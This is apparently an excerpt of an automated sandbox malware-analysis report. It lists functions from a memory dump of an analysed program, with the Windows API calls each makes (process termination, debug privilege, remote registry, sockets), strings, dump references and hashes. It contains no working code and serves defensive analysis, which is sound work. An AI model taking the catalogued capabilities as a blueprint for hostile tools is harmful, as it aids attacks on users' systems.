                                                                                                          • Instruction Fuzzy Hash: 7C918F70A00219ABDF24CFA5D844FEFB7B8EF85714F10955DE615BB242D7709944CBA0
                                                                                                          Function 00EC73A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EC7449
                                                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00EC745D
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EC7477
                                                                                                          • _wcscat.LIBCMT ref: 00EC74D2
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EC74E9
                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EC7517
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window_wcscat
                                                                                                          • String ID: SysListView32
                                                                                                          • API String ID: 307300125-78025650
                                                                                                          • Opcode ID: cb223f65c61e2c70b39a1973a2ed025aba10b62336e404472928149faede2d72
                                                                                                          • Instruction ID: d83d9d83cc223cd7cba955a9770721413a433927da19950c5db701888901259b
                                                                                                          • Opcode Fuzzy Hash: cb223f65c61e2c70b39a1973a2ed025aba10b62336e404472928149faede2d72
                                                                                                          • Instruction Fuzzy Hash: DE41A070A04348AFEB219F64CC85FEE7BE8EF08354F10546AFA94B7291D6729D85CB50
                                                                                                          Function 00EBF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EA4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00EA416D
                                                                                                            • Part of subcall function 00EA4148: Process32FirstW.KERNEL32(00000000,?), ref: 00EA417B
                                                                                                            • Part of subcall function 00EA4148: CloseHandle.KERNEL32(00000000), ref: 00EA4245
                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBF08D
                                                                                                          • GetLastError.KERNEL32 ref: 00EBF0A0
                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBF0CF
                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EBF14C
                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00EBF157
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EBF18C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                          • String ID: SeDebugPrivilege
                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                          • Opcode ID: ea74c697cae62ec78118cc4c0602d96d5d918a36090597321f5e0a635e9b280d
                                                                                                          • Instruction ID: 92e9ed532e392268eb5cb0410f42dcee16c0584e923e41c7e92322ee0592fae1
                                                                                                          • Opcode Fuzzy Hash: ea74c697cae62ec78118cc4c0602d96d5d918a36090597321f5e0a635e9b280d
                                                                                                          • Instruction Fuzzy Hash: BF41AC713012019FDB15EF28DC95FAEB7E5AF84714F189819F942AB2D3CB74A808CB95
                                                                                                          Function 00EA34DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00EA357C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconLoad
                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                          • API String ID: 2457776203-404129466
                                                                                                          • Opcode ID: ff901abefe2f0c1e2021ec4d5e97baa2a4c645c0f817a0dd98d5fb43f38a6de8
                                                                                                          • Instruction ID: 76f2b316896ebf0f9bc03b01601bec9416c40b7db882987f74cba0bcc2f3283b
                                                                                                          • Opcode Fuzzy Hash: ff901abefe2f0c1e2021ec4d5e97baa2a4c645c0f817a0dd98d5fb43f38a6de8
                                                                                                          • Instruction Fuzzy Hash: 44110D71E49346BEE7105A38EC92DBA77DCDF0F364B20201AF600BE181E7647F4055A0
                                                                                                          Function 00EA47E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EA4802
                                                                                                          • LoadStringW.USER32(00000000), ref: 00EA4809
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EA481F
                                                                                                          • LoadStringW.USER32(00000000), ref: 00EA4826
                                                                                                          • _wprintf.LIBCMT ref: 00EA484C
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EA486A
                                                                                                          Strings
                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00EA4847
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                          • API String ID: 3648134473-3128320259
                                                                                                          • Opcode ID: e821325ac730f4d7cbf3e8c8f543c97a743b9618573d2b5b7a0fc7e6a74306f5
                                                                                                          • Instruction ID: 9a8efe09fd9779e51dbaf78a19b7d9c7abd6c3f2c5ea9f355966b602a4e576a9
                                                                                                          • Opcode Fuzzy Hash: e821325ac730f4d7cbf3e8c8f543c97a743b9618573d2b5b7a0fc7e6a74306f5
                                                                                                          • Instruction Fuzzy Hash: BD0167F29413087FE71197A1ED89FFA736CD748300F440596B759F6041E6749E884B75
                                                                                                          Function 00ECDB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00ECDB42
                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00ECDB62
                                                                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00ECDD9D
                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00ECDDBB
                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00ECDDDC
                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 00ECDDFB
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00ECDE20
                                                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00ECDE43
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1211466189-0
                                                                                                          • Opcode ID: 4624b1fadb2772d4d56cf1106425b0ddc080592b0bf8629405b44fffa5c5ac84
                                                                                                          • Instruction ID: 26dc3aa1a18b264501122de1256002f86ab94131bcc882cad7464012789972d9
                                                                                                          • Opcode Fuzzy Hash: 4624b1fadb2772d4d56cf1106425b0ddc080592b0bf8629405b44fffa5c5ac84
                                                                                                          • Instruction Fuzzy Hash: 9BB1AB31A04219EFCF14CF69CA84BAD7BB1FF44704F08917AEC49AE295D732A951CB90
                                                                                                          Function 00EC0371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00EC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EC040D,?,?), ref: 00EC1491
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EC044E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3479070676-0
                                                                                                          • Opcode ID: 29c6ddc4f671f47db769ee4c41eb7169e6a29e670160f13ccba3f2ed36c1801d
                                                                                                          • Instruction ID: 7ed72f0b1c9a079932ca60d59a9d9e1bbdde2960c973770125f8543ff41b20e6
                                                                                                          • Opcode Fuzzy Hash: 29c6ddc4f671f47db769ee4c41eb7169e6a29e670160f13ccba3f2ed36c1801d
                                                                                                          • Instruction Fuzzy Hash: 49A16970204201DFCB15EF64C981F6EB7E5EF84314F14991DF996A72A2DB32E94ACB42
                                                                                                          Function 00E42E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E7C508,00000004,00000000,00000000,00000000), ref: 00E42E9F
                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E7C508,00000004,00000000,00000000,00000000,000000FF), ref: 00E42EE7
                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E7C508,00000004,00000000,00000000,00000000), ref: 00E7C55B
                                                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E7C508,00000004,00000000,00000000,00000000), ref: 00E7C5C7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ShowWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1268545403-0
                                                                                                          • Opcode ID: 80f11ee0bd29f92c49379e4c707e23107e511c8eda3ae67f04f5cc1e61ceca23
                                                                                                          • Instruction ID: 8a3fe756dd91e1f0346af16824dbc130ed380c08cd437aa1bb96c9e1170ff8e8
                                                                                                          • Opcode Fuzzy Hash: 80f11ee0bd29f92c49379e4c707e23107e511c8eda3ae67f04f5cc1e61ceca23
                                                                                                          • Instruction Fuzzy Hash: C241E9306046809EC737DB29E88876A7FD6AB81304FA8B44FF647765A0C772F945D711
                                                                                                          Function 00EA7681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EA7698
                                                                                                            • Part of subcall function 00E60FE6: std::exception::exception.LIBCMT ref: 00E6101C
                                                                                                            • Part of subcall function 00E60FE6: __CxxThrowException@8.LIBCMT ref: 00E61031
                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EA76CF
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00EA76EB
                                                                                                          • _memmove.LIBCMT ref: 00EA7739
                                                                                                          • _memmove.LIBCMT ref: 00EA7756
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00EA7765
                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EA777A
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA7799
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 256516436-0
                                                                                                          • Opcode ID: 6244ea79e17689ecbb3a9f87efc74f7fb3aacd2b64dd4284cbf4feb0ca46d72f
                                                                                                          • Instruction ID: fde8a6a1751a9d3239bbf030ee902e61732b03ec5e741f048cb228934d725424
                                                                                                          • Opcode Fuzzy Hash: 6244ea79e17689ecbb3a9f87efc74f7fb3aacd2b64dd4284cbf4feb0ca46d72f
                                                                                                          • Instruction Fuzzy Hash: 43315E31A05205AFCB10EF55EC85E6EB7B8EF45350F1840A6F904BA256D7309A54DBA0
                                                                                                          Function 00EC67F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00EC6810
                                                                                                          • GetDC.USER32(00000000), ref: 00EC6818
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EC6823
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00EC682F
                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EC686B
                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EC687C
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EC964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00EC68B6
                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EC68D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3864802216-0
                                                                                                          • Opcode ID: 4a3ba2590b19a9145aa67047036d3010e539aee3f15df37a4020ea77a09fddba
                                                                                                          • Instruction ID: 057f97e0e3cf01792c3c9d27a152dbe073aa736f7d179fbdef2b22ec5f32ac0c
                                                                                                          • Opcode Fuzzy Hash: 4a3ba2590b19a9145aa67047036d3010e539aee3f15df37a4020ea77a09fddba
                                                                                                          • Instruction Fuzzy Hash: 00318D721022107FEB148F11DD4AFEB3BA9EB49765F080055FE08AA291C6769C51CB70
                                                                                                          Function 00E9C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2931989736-0
                                                                                                          • Opcode ID: c126695322beb3abc059319e040d276b344d96d8ab9ae6eb660437be67ab29d3
                                                                                                          • Instruction ID: aa1354ed2440a159feb31215fc585145ca57ad545a02d5ec627a206468a385fe
                                                                                                          • Opcode Fuzzy Hash: c126695322beb3abc059319e040d276b344d96d8ab9ae6eb660437be67ab29d3
                                                                                                          • Instruction Fuzzy Hash: 7E2107766412057BDA157570DE82FBF73ACDE10788B283022FD02B6342E751DE22CAA2
                                                                                                          Function 00EAF166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                            • Part of subcall function 00E5436A: _wcscpy.LIBCMT ref: 00E5438D
                                                                                                          • _wcstok.LIBCMT ref: 00EAF2D7
                                                                                                          • _wcscpy.LIBCMT ref: 00EAF366
                                                                                                          • _memset.LIBCMT ref: 00EAF399
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                          • String ID: X
                                                                                                          • API String ID: 774024439-3081909835
                                                                                                          • Opcode ID: e1e37e968dbb4d8e59fd563d62112e18d31b4a658873e74595b0c66faa69568e
                                                                                                          • Instruction ID: 3b6f9777bfc81b918149051ed6039543ac28601d5a5d3b06b1fcad7ca9b057ec
                                                                                                          • Opcode Fuzzy Hash: e1e37e968dbb4d8e59fd563d62112e18d31b4a658873e74595b0c66faa69568e
                                                                                                          • Instruction Fuzzy Hash: 8AC19F716043409FC714EF64D841A5EB7E4FF89354F14696DF899AB2A2DB30EC49CB82
                                                                                                          Function 00EB71EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EB72EB
                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EB730C
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB731F
                                                                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 00EB73D5
                                                                                                          • inet_ntoa.WSOCK32(?), ref: 00EB7392
                                                                                                            • Part of subcall function 00E9B4EA: _strlen.LIBCMT ref: 00E9B4F4
                                                                                                            • Part of subcall function 00E9B4EA: _memmove.LIBCMT ref: 00E9B516
                                                                                                          • _strlen.LIBCMT ref: 00EB742F
                                                                                                          • _memmove.LIBCMT ref: 00EB7498
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                          • String ID:
                                                                                                          • API String ID: 3619996494-0
                                                                                                          • Opcode ID: 7f90786999c56d065357f69a22fcd8d757403c99444395f2a8ff0d5bffdf07e5
                                                                                                          • Instruction ID: b6072308d9d4538cd199202c253110d12bdfdfd0e2ab520465cc5a20416420d1
                                                                                                          • Opcode Fuzzy Hash: 7f90786999c56d065357f69a22fcd8d757403c99444395f2a8ff0d5bffdf07e5
                                                                                                          • Instruction Fuzzy Hash: A181A0B1208200ABD710EB24DC81FABB7E8EFC4714F146919F995BB2E2DA709D05CB91
                                                                                                          Function 00E41800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9f8e921fef5b15bea0426deb0f68442e46a548215fe6d0e5aee790c775c48498
                                                                                                          • Instruction ID: e9d1475e2ea7c3681f8d38b60f8d5007edda221c3bd54893de35c348c296d65d
                                                                                                          • Opcode Fuzzy Hash: 9f8e921fef5b15bea0426deb0f68442e46a548215fe6d0e5aee790c775c48498
                                                                                                          • Instruction Fuzzy Hash: D4713D70900109EFDF08DF59DC49AAEBBB9FF8A314F148199F915BA251C7349A91CBA0
                                                                                                          Function 00ECB9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsWindow.USER32(010C5680), ref: 00ECBA5D
                                                                                                          • IsWindowEnabled.USER32(010C5680), ref: 00ECBA69
                                                                                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00ECBB4D
                                                                                                          • SendMessageW.USER32(010C5680,000000B0,?,?), ref: 00ECBB84
                                                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 00ECBBC1
                                                                                                          • GetWindowLongW.USER32(010C5680,000000EC), ref: 00ECBBE3
                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00ECBBFB
                                                                                                          Memory Dump Source
